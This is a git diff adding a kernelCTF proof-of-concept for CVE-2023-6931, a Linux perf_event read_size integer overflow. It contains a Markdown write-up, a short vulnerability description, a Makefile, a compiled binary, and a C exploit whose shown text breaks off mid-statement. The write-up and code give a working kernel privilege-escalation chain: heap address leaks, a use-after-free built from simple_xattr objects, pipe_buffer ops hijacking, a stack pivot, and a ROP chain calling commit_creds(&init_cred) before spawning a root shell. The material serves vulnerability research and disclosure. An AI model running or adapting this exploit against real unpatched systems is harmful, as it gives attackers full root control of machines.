diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md
new file mode 100644
index 00000000..12ce0e4c
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md
@@ -0,0 +1,188 @@
+# CVE-2023-6931
+
+## Exploit Details
+
+Exploit demo for CVE-2023-6931. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1730717209:a3542a691dd87b35d0914ae264575ea3d6e888aa}`
+
+## Overview
+
+The vulnerability allows multiple out-of-bounds increments at controlled offsets past the end of a heap allocation. The exploit for the LTS/COS instances leverages `netlink_sock`, a fixed-size object, and therefore works inside the SLUB allocator. On the mitigation instance, however, protections such as `CONFIG_KMALLOC_SPLIT_VARSIZE` make that approach considerably harder. To bypass them, this exploit is carried out entirely within the buddy allocator, without relying on the SLUB allocator. Using only the buddy allocator makes many otherwise useful objects unavailable and increases the complexity of the exploit. Additionally, although the vulnerability is a heap OOB write, the OOB is only used to construct a use-after-free (UAF), so the rest of the exploitation is essentially the same as exploiting a UAF.
+
+## KASLR & Heap & VMEMMAP Leak
+
+```c
+for_each_sibling_event(sub, leader) {
+	values[n++] += perf_event_count(sub);
+	if (read_format & PERF_FORMAT_ID)
+		values[n++] = primary_event_id(sub);
+	if (read_format & PERF_FORMAT_LOST)
+		values[n++] = atomic64_read(&sub->lost_samples);
+}
+```
+The OOB accesses happen in the loop above, so the event count, the event ID, and the lost-sample count can all be used to tamper with adjacent objects.
+
+By repeatedly opening and closing events, the event ID can be made large. The OOB write then overwrites the size field of a `simple_xattr` object with that ID, so reading the xattr back leaks the members of the adjacent objects (`pipe_buffer`, `simple_xattr`) and gives us the KASLR, heap, and VMEMMAP addresses.
+
+## Make UAF
+
+In kernels before linux-v6.2, xattrs are managed with a `struct list_head`. Therefore, if you corrupt the linked-list pointers of a `simple_xattr` object with the OOB write and make them point to a fake object, you can trigger a UAF.
+
+```
+Note
+
+In linux-v6.2 and later, xattrs are managed with a `struct rb_node`, and the tree is sorted by name. A UAF can still be created by choosing names with the right ordering and corrupting `rb_left` or `rb_right` to point to a fake object, so the `simple_xattr` technique remains valid on newer kernels.
+```
+
+Setting the event config to `PERF_COUNT_SW_PAGE_FAULTS` makes the counter measure page faults, so the event count can be driven to any desired value by intentionally causing page faults.
+
+I used the event count to increase the `next` field of a `simple_xattr` by 0x30. The `next` pointer then points into the value field of that `simple_xattr`, which lets me place fake objects there as I want.
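+
+Below is a minimal sketch, condensed from `exploit.c`, of how the counter is driven to an exact value and how the out-of-bounds increment is then triggered (error handling omitted):
+
+```c
+/* condensed from exploit.c: count page faults on this task, then let
+ * perf_read_group() add the accumulated count to the out-of-bounds slot */
+struct perf_event_attr pe = {
+	.type = PERF_TYPE_SOFTWARE,
+	.size = sizeof(pe),
+	.config = PERF_COUNT_SW_PAGE_FAULTS,
+	.disabled = 1,
+	.exclude_kernel = 1,
+	.exclude_hv = 1,
+	.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_GROUP | PERF_FORMAT_LOST,
+};
+int leader = syscall(SYS_perf_event_open, &pe, 0, -1, -1, 0);
+/* ... add siblings until the leader's read_size overflows ... */
+
+char buf[0x10000];
+ioctl(leader, PERF_EVENT_IOC_RESET, 0);
+ioctl(leader, PERF_EVENT_IOC_ENABLE, 0);
+for (int i = 0; i < 0x30; i++) {          /* 0x30 faults => +0x30 on the OOB slot */
+	int *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
+	              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+	*p = 1;                           /* first write faults in the fresh page */
+}
+ioctl(leader, PERF_EVENT_IOC_DISABLE, 0);
+read(leader, buf, sizeof(buf));           /* perf_read_group() performs the OOB increments */
+```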
+
+```c
+int setxattr_copy(const char __user *name, struct xattr_ctx *ctx)
+{
+	int error;
+
+	if (ctx->flags & ~(XATTR_CREATE|XATTR_REPLACE))
+		return -EINVAL;
+
+	error = strncpy_from_user(ctx->kname->name, name,
+				sizeof(ctx->kname->name));
+	if (error == 0 || error == sizeof(ctx->kname->name))
+		return -ERANGE;
+	if (error < 0)
+		return error;
+
+	error = 0;
+	if (ctx->size) {
+		if (ctx->size > XATTR_SIZE_MAX)
+			return -E2BIG;
+
+		ctx->kvalue = vmemdup_user(ctx->cvalue, ctx->size);
+		if (IS_ERR(ctx->kvalue)) {
+			error = PTR_ERR(ctx->kvalue);
+			ctx->kvalue = NULL;
+		}
+	}
+
+	return error;
+}
+```
+
+```c
+void *vmemdup_user(const void __user *src, size_t len)
+{
+	void *p;
+
+	p = kvmalloc(len, GFP_USER);
+	if (!p)
+		return ERR_PTR(-ENOMEM);
+
+	if (copy_from_user(p, src, len)) {
+		kvfree(p);
+		return ERR_PTR(-EFAULT);
+	}
+
+	return p;
+}
+```
+As shown above, before the `simple_xattr` object is allocated, the user-supplied value is copied into a temporary buffer allocated with `vmemdup_user()`, and that buffer is kvfreed once the value has been copied into the new object. When an allocation large enough to come straight from the buddy system (order 2 here) is kvfreed, the page data is left intact, so this code path can be used to freely control all of the data of whatever object is reallocated on top of it, including its header, such as the UAF object. I actively used this temporary buffer in my exploit.
+```c
+((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30;
+((uint64_t *)value)[3] = 0;
+((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30;
+((uint64_t *)value)[5] = 0x10;
+```
+The code above builds the fake object. When the victim's `next` field is incremented by 0x30 it points at this fake object, and the `next` field of the fake object is set to `xattr + 0x20000 + 0x40`, which is the value field of the target object to be UAFed. `xattr` is the address of one of the `simple_xattr` objects leaked earlier.
+```c
+((uint64_t *)value)[0] = xattr + 0x18000;
+((uint64_t *)value)[1] = xattr + 0x18000;
+((uint64_t *)value)[2] = leakname;
+((uint64_t *)value)[3] = 0x3000;
+((uint64_t *)value)[4] = xattr + 0x20000 + 0x80;
+((uint64_t *)value)[5] = xattr + 0x20000 + 0x60;
+((uint64_t *)value)[6] = leakname;
+((uint64_t *)value)[7] = 0x3000;
+((uint64_t *)value)[8] = xattr + 0x20000 + 0x40;
+((uint64_t *)value)[12] = xattr + 0x18000;
+((uint64_t *)value)[13] = xattr + 0x20000 + 0x40;
+((uint64_t *)value)[14] = leakname;
+((uint64_t *)value)[15] = 0x3000;
+```
+This is the target object used to create the UAF. Because the buddy free lists are last-in-first-out, once the target object is freed, the next temporary-buffer allocation reuses the freed target's pages. So the value above is written and kvfreed immediately, yet the target object stays linked into the `simple_xattr` list through the fake object, and the use-after-free can be triggered.
+
+```c
+bool __list_del_entry_valid(struct list_head *entry)
+{
+	struct list_head *prev, *next;
+
+	prev = entry->prev;
+	next = entry->next;
+
+	if (CHECK_DATA_CORRUPTION(next == NULL,
+			"list_del corruption, %px->next is NULL\n", entry) ||
+	    CHECK_DATA_CORRUPTION(prev == NULL,
+			"list_del corruption, %px->prev is NULL\n", entry) ||
+	    CHECK_DATA_CORRUPTION(next == LIST_POISON1,
+			"list_del corruption, %px->next is LIST_POISON1 (%px)\n",
+			entry, LIST_POISON1) ||
+	    CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
+			"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",
+			entry, LIST_POISON2) ||
+	    CHECK_DATA_CORRUPTION(prev->next != entry,
+			"list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n",
+			entry, prev->next, prev) ||
+	    CHECK_DATA_CORRUPTION(next->prev != entry,
+			"list_del corruption. next->prev should be %px, but was %px. (next=%px)\n",
+			entry, next->prev, next))
+		return false;
+
+	return true;
+
+}
+```
+The target object's value is laid out in this relatively complex way in order to pass the validation above: the entry can only be unlinked cleanly when `entry == prev->next && entry == next->prev` holds.
+
+## UAF to RIP Control
+
+At this point the UAF exists, but it is not directly usable yet. The plan is to reclaim the target object's address with the object we want to overwrite and then free the target object, which is still linked into the xattr list, on top of it. However, the moment the target address is reallocated, its contents are rewritten to match the new object, so the data satisfying `entry == prev->next && entry == next->prev` is destroyed and the target can no longer be freed from the `simple_xattr` linked list.
+
+To solve this, we need an object that is filled with user-controlled data at allocation time, such as `msg_msg`, and that can be allocated with a size above 0x2000. With such an object, the list pointers can be re-established at the same moment the chunk is taken from the free list, so the target object's data is never destroyed.
+
+The `user_key_payload` object satisfies these conditions perfectly. So the target address is first reclaimed as a `user_key_payload`, and the target object still linked into the `simple_xattr` list is freed again. The freed target address is then reclaimed by a `pipe_buffer` array, and the previously allocated `user_key_payload` is freed. Allocating one more `simple_xattr` places its temporary value buffer at the freed `user_key_payload` address, which lets us freely rewrite the fields of the overlapping `pipe_buffer`. Being able to overwrite `pipe_buffer->ops` gives RIP control: I replaced `pipe_buffer->ops->release()` so that RIP is hijacked when the `pipe_buffer` is freed.
+
+## RIP Control to ROP
+
+Next, a stack pivot to a heap address is needed to run a ROP chain.
+```c
+void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
+```
+When `pipe_buffer->ops->release()` is called, the arguments are passed as above, so rsi holds the address of the `pipe_buffer` being released. Since rsi points at data we control, `mov rsp, rsi ; ret` would be enough to start the ROP chain, but I could not find such a clean gadget, so I combined `push rsi ; jmp qword ptr [rsi + 0x66]` with `pop rsp ; ret` to achieve the same effect.
+
+Now rsp points at the `pipe_buffer` structure. However, because the overwritten `pipe_buffer->ops` field sits in that header, rsp has to be moved further down to leave room for a clean ROP chain, so `pop rsp ; ret` is executed once more.
+
+## ROP Chain
+
+```c
+rop[ridx++] = pop_rdi;
+rop[ridx++] = 1;
+rop[ridx++] = find_task_by_vpid;
+rop[ridx++] = mov_rdi_rax_pop_rbx;
+rop[ridx++] = 0;
+rop[ridx++] = pop_rsi;
+rop[ridx++] = init_nsproxy;
+rop[ridx++] = switch_task_namespaces;
+rop[ridx++] = pop_rdi;
+rop[ridx++] = init_cred;
+rop[ridx++] = commit_creds;
+rop[ridx++] = kpti_trampoline;
+rop[ridx++] = 0;
+rop[ridx++] = 0;
+rop[ridx++] = (uint64_t)shell;
+rop[ridx++] = rv.user_cs;
+rop[ridx++] = rv.user_rflags;
+rop[ridx++] = rv.user_rsp;
+rop[ridx++] = rv.user_ss;
+```
+The ROP chain is written as above.
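+
+The `rv.user_*` entries at the end of the chain are a snapshot of the userspace registers, saved by `backup_rv()` in `exploit.c` (built with `-masm=intel`, see the Makefile) before RIP control is triggered:
+
+```c
+struct register_val {
+	uint64_t user_rip;
+	uint64_t user_cs;
+	uint64_t user_rflags;
+	uint64_t user_rsp;
+	uint64_t user_ss;
+} __attribute__((packed));
+struct register_val rv;
+
+void backup_rv(void) {
+	asm("mov rv+8, cs;"
+	    "pushf; pop rv+16;"
+	    "mov rv+24, rsp;"
+	    "mov rv+32, ss;"
+	);
+}
+```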
+I switched the task into the init namespaces by executing `switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)` and then elevated privileges to root by executing `commit_creds(&init_cred)`.
+
+Returning to user mode is done by calling the `swapgs_restore_regs_and_return_to_usermode` function. Since that function starts with a long series of pops, we skip those and enter it right after them.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..d340593a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md
@@ -0,0 +1,5 @@
+When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_event_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group can also increase and is not checked. An integer overflow can therefore be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows.
+
+`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation.
+
+The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in 3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 ("perf: Fix perf_event_validate_size()")` in 6.7.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile
new file mode 100644
index 00000000..e3ea5fdb
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile
@@ -0,0 +1,11 @@
+exploit:
+	gcc -masm=intel -static -o exploit exploit.c -lkeyutils
+
+prerequisites:
+	sudo apt-get install libkeyutils-dev
+
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit
new file mode 100755
index 00000000..280a6908
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c
new file mode 100644
index 00000000..431825c0
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c
@@ -0,0 +1,656 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <stdarg.h>
+#include <assert.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/msg.h>
+#include <sys/ipc.h>
+#include <sys/resource.h>
+#include <sys/xattr.h>
+#include <linux/perf_event.h>
+#include <keyutils.h>
+
+#define XATTR_PREFIX_SECURITY "security."
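+
+/*
+ * Exploit flow (see docs/exploit.md for details):
+ *  1. Overflow a perf event group's read_size so that perf_read_group()
+ *     increments/writes out of bounds, and use that to leak KASLR, heap and
+ *     VMEMMAP addresses from adjacent simple_xattr / pipe_buffer objects.
+ *  2. Count page faults with PERF_COUNT_SW_PAGE_FAULTS to add exactly 0x30
+ *     to a simple_xattr list.next pointer, linking a fake xattr entry.
+ *  3. Turn the fake entry into a UAF, reclaim it with user_key_payload and
+ *     pipe_buffer, and overwrite pipe_buffer->ops for RIP control.
+ *  4. Stack-pivot into the controlled buffer and run the ROP chain:
+ *     switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy),
+ *     commit_creds(&init_cred), then return to userspace via the kpti
+ *     trampoline and spawn a shell.
+ */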
+
+struct xattr_return {
+	uint64_t size;
+	char *value;
+};
+
+struct pipeio {
+	struct {
+		int readfd, writefd;
+	} pipe;
+	bool is_ops_activated;
+};
+
+struct read_format {
+	__u64 value;        // counter value
+	__u64 time_enabled; // time the event was enabled
+	__u64 time_running; // time the event was actually counting
+	__u64 id;           // event ID
+	__u64 lost;         // number of lost events
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct msg_msgseg {
+	struct msg_msgseg *next;
+	char m_text[];
+};
+
+struct msg_msg{
+	struct list_head m_list;
+	int64_t m_type;
+	int m_ts;
+	struct msg_msgseg *next;
+	void *security;
+	char m_text[];
+};
+
+struct msg {
+	int64_t m_type;
+	char m_text[];
+};
+
+#define MSG_HEADER_SIZE sizeof(struct msg)
+#define MSG_MSG_HEADER_SIZE sizeof(struct msg_msg)
+#define MSG_MSGSEG_HEADER_SIZE sizeof(struct msg_msgseg)
+
+struct pipeio *pipes[0x100];
+struct pipeio *pipes1[0x10000];
+
+struct pipeio *create_pipeio(void){
+	struct pipeio *pio = (struct pipeio *)calloc(sizeof(struct pipeio), 1);
+	if(pipe((int *)&pio->pipe) < 0)
+		perror("pipe alloc");
+	pio->is_ops_activated = false;
+	return pio;
+}
+
+void resize_pipe(struct pipeio *pipe, uint64_t objectsz){
+	if(fcntl(pipe->pipe.writefd, F_SETPIPE_SZ, objectsz) < 0)
+		perror("pipe resize");
+}
+
+void read_pipe(struct pipeio *pipe, char *buf, uint64_t size){
+	if(read(pipe->pipe.readfd, buf, size) < 0)
+		perror("pipe read");
+}
+
+void write_pipe(struct pipeio *pipe, char *buf, uint64_t size){
+	if(write(pipe->pipe.writefd, buf, size) < 0)
+		perror("pipe write");
+	else
+		pipe->is_ops_activated = true;
+}
+
+void release_pipe(struct pipeio *pipe){
+	if(!pipe)
+		return;
+	close(pipe->pipe.readfd);
+	close(pipe->pipe.writefd);
+	free(pipe);
+}
+
+int alloc_msg_queue(void){
+	int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+	if (msqid == -1)
+		perror("msgget");
+	return msqid;
+}
+
+void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext){
+	assert(msgsz <= objectsz);
+	struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + objectsz, 1);
+	msg->m_type = mtype;
+	memset(msg->m_text, '\xbf', objectsz);
+	memcpy(msg->m_text, mtext, msgsz);
+	if (msgsnd(msqid, msg, objectsz, 0) < 0)
+		perror("msgsnd");
+}
+
+static long
+perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_group_leader, unsigned long flags){
+	return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_group_leader, flags);
+}
+
+char *gen_xattr_name(char *prefix, char *name){
+	assert(prefix[strlen(prefix) - 1] == '.');
+	char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + 1, 1);
+	strcpy(xattr_name, prefix);
+	strcat(xattr_name, name);
+	return xattr_name;
+}
+
+struct xattr_return *read_xattr(char *fname, char *name){
+	struct xattr_return *ret = (struct xattr_return *)calloc(sizeof(struct xattr_return), 1);
+	ret->value = (char *)calloc(0x10000, 1);
+	if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0)
+		puts("getxattr error");
+	return ret;
+}
+
+static inline key_serial_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid)
+{
+	return syscall(__NR_add_key, type, desc, payload, plen, ringid);
+}
+
+static inline key_serial_t sys_keyctl(int cmd, ...)
+{ + va_list ap; + long arg2, arg3, arg4, arg5; + + va_start(ap, cmd); + arg2 = va_arg(ap, long); + arg3 = va_arg(ap, long); + arg4 = va_arg(ap, long); + arg5 = va_arg(ap, long); + va_end(ap); + + return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); +} + +void spray(){ + char *fname = "/tmp/zzlol"; + close(open("/tmp/zzlol", O_CREAT, 0644)); + char value[0x5000] = {0, }; + memset(value, 'A', 0x3fc0); + char z[0x10] = {0, }; + for(int i = 0; i <= 1994; i++){ + sprintf(z,"zzlol%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + setxattr(fname, name, value, 0x3fc0, 0); + } + pipes[0] = create_pipeio(); + resize_pipe(pipes[0], 0x1000 * 0x100); + pipes[1] = create_pipeio(); + resize_pipe(pipes[1], 0x1000 * 0x100); + sprintf(z,"zzlol%d",1997); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + setxattr(fname, name, value, 0x3fc0, 0); + for(int i = 0; i < 0x10; i++){ + pipes[i] = create_pipeio(); + resize_pipe(pipes[i], 0x1000 * 0x100); + char aa[0x100] = { 0, }; + memset(aa, 'y', 0x40); + memset(aa, 't', 0x38); + memcpy(aa+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(aa+0x40,"haha%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, aa); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + } +} + +void DumpHex(const void* data, size_t size) { + char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } +} + +uint64_t virt2page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base){ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} + +void cpu_affinity(int cpu){ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + if (sched_setaffinity(0, sizeof(mask), &mask) < 0) + perror("sched_setaffinity"); +} + +void fdlimit(int limit){ + struct rlimit rl; + getrlimit(RLIMIT_NOFILE, &rl); + rl.rlim_cur = limit; + if(setrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("setrlimit"); + exit(EXIT_FAILURE); + } +} + +void signal_handler(int signo) { + if(signo == SIGUSR1){ + puts("[+] Finish Child"); + } +} + +struct register_val { + uint64_t user_rip; + uint64_t user_cs; + uint64_t user_rflags; + uint64_t user_rsp; + uint64_t user_ss; +} __attribute__((packed)); +struct register_val rv; + +void backup_rv(void) { + asm("mov rv+8, cs;" + "pushf; pop rv+16;" + "mov rv+24, rsp;" + "mov rv+32, ss;" + ); +} + +void shell(){ + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + int netns_fd = open("/proc/1/ns/net", O_RDONLY); + int pidns_fd = open("/proc/1/ns/pid", O_RDONLY); + + if (mntns_fd == -1) + perror("[-] open(/proc/1/ns/mnt)"); + if (setns(mntns_fd, CLONE_NEWNS) == -1) + perror("[-] setns mnt"); + + if (netns_fd == -1) + perror("[-] open(/proc/1/ns/net)"); + if (setns(netns_fd, CLONE_NEWNET) == -1) + perror("[-] setns net"); + + if (pidns_fd == -1) + perror("[-] open(/proc/1/ns/pid)"); + if (setns(pidns_fd, CLONE_NEWPID) == -1) + perror("[-] setns pid"); + + char *const argv[] = { "/bin/sh" }; + char *const envp[] = { NULL }; + execve("/bin/sh", argv, envp); +} + +int main(int argc, char *argv[], char 
*envp[]){ + cpu_affinity(0); + fdlimit(4096); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + if(signal(SIGUSR1, signal_handler) == SIG_ERR){ + puts("[-] Exploit Fail"); + exit(0); + } + int group_leader, event, finev, prev; + char count[0x10000] = { 0, }; + int events[0x10000] = { 0, }; + char value[0x3000] = {0, }; + char aa[0x100] = { 0, }; + char cmd[0x100] = {0, }; + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_ID | PERF_FORMAT_GROUP; + + group_leader = perf_event_open(&pe, 0, -1, -1, 0); + if (group_leader == -1) { + fprintf(stderr, "Error opening leader %llx\n", pe.config); + exit(EXIT_FAILURE); + } + puts("[+] Incrementing event ID"); + for(int _ = 0; _ < 10; _++){ + for(int i = 0; i < 4096; i++){ + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + close(event); + } + } + } + puts("[+] Add Siblings"); + pid_t parent_pid; + parent_pid = getpid(); + pid_t child_pid = fork(); + if(fork < 0) puts("fail"); + else if(child_pid == 0){ + for(int i = 0; i < 2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, parent_pid, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + kill(parent_pid, SIGUSR1); + sleep(999999); + } + pause(); + for(int i = 0; i < (0x10000/0x10+0x2000/0x10)-2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i+2000] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + puts("[+] Spraying xattr"); + spray(); + char *fname = "/tmp/zzlol"; + char *z = "zzlol1994"; + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + removexattr(fname, name); + read(group_leader, count, 0xffff); + for(int i = 0; i < 0x10; i++){ + write_pipe(pipes[i], "AAAAAAAA", 8); + } + z = "zzlol1997"; + name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + struct xattr_return *xret = read_xattr("/tmp/zzlol", name); + + printf("[+] xattr size: 0x%lx\n", xret->size); + uint64_t kpage = ((uint64_t *)xret->value)[0x7fc]; + uint64_t vmemmap_base = (kpage >> 28) << 28; + uint64_t kleak = ((uint64_t *)xret->value)[0x7fe]; + uint64_t kbase = kleak - 0x1c1f140; + uint64_t modprobe_path = kbase + 0x2a777e0; + printf("[+] kernel base : 0x%lx\n", kbase); + printf("[+] vmemap base : 0x%lx\n", vmemmap_base); + uint64_t xattr = ((uint64_t *)xret->value)[4092] & 
0xfffffffffffffffe; + uint64_t leakname = ((uint64_t *)xret->value)[4094]; + uint64_t kheap_base = ((xattr - 0x6000000) >> 28) << 28; + printf("[+] xattr : 0x%lx\n", xattr); + printf("[+] name : 0x%lx\n", leakname); + printf("[+] kheap base : 0x%lx\n", kheap_base); + puts("[+] Closing Events"); + for(int i = 0; i < 0x10000/0x10+0x2000/0x10; i++){ + close(events[i]); + } + close(group_leader); + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_GROUP | PERF_FORMAT_LOST; + + group_leader = perf_event_open(&pe, 0, -1, -1, 0); + + puts("[+] Add Sibnings"); + parent_pid = getpid(); + child_pid = fork(); + if(fork < 0) puts("fail"); + else if(child_pid == 0){ + for(int i = 0; i < 2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, parent_pid, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + kill(parent_pid, SIGUSR1); + sleep(999999); + } + pause(); + for(int i = 0; i < (0x10000/0x10+0x2100/0x10)-2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i+2000] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + struct pipeio *pipepipe = create_pipeio(); + resize_pipe(pipepipe, 0x1000 * 0x100); + puts("[+] Page Faulting"); + int *ptr = NULL; + ioctl(group_leader, PERF_EVENT_IOC_RESET, 0); + ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0); + for(int i = 0; i < 0x30; i++){ + ptr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + *ptr = 1; + } + ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0); + + fname = "/tmp/zzlol"; + char zz[0x100] = {0, }; + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 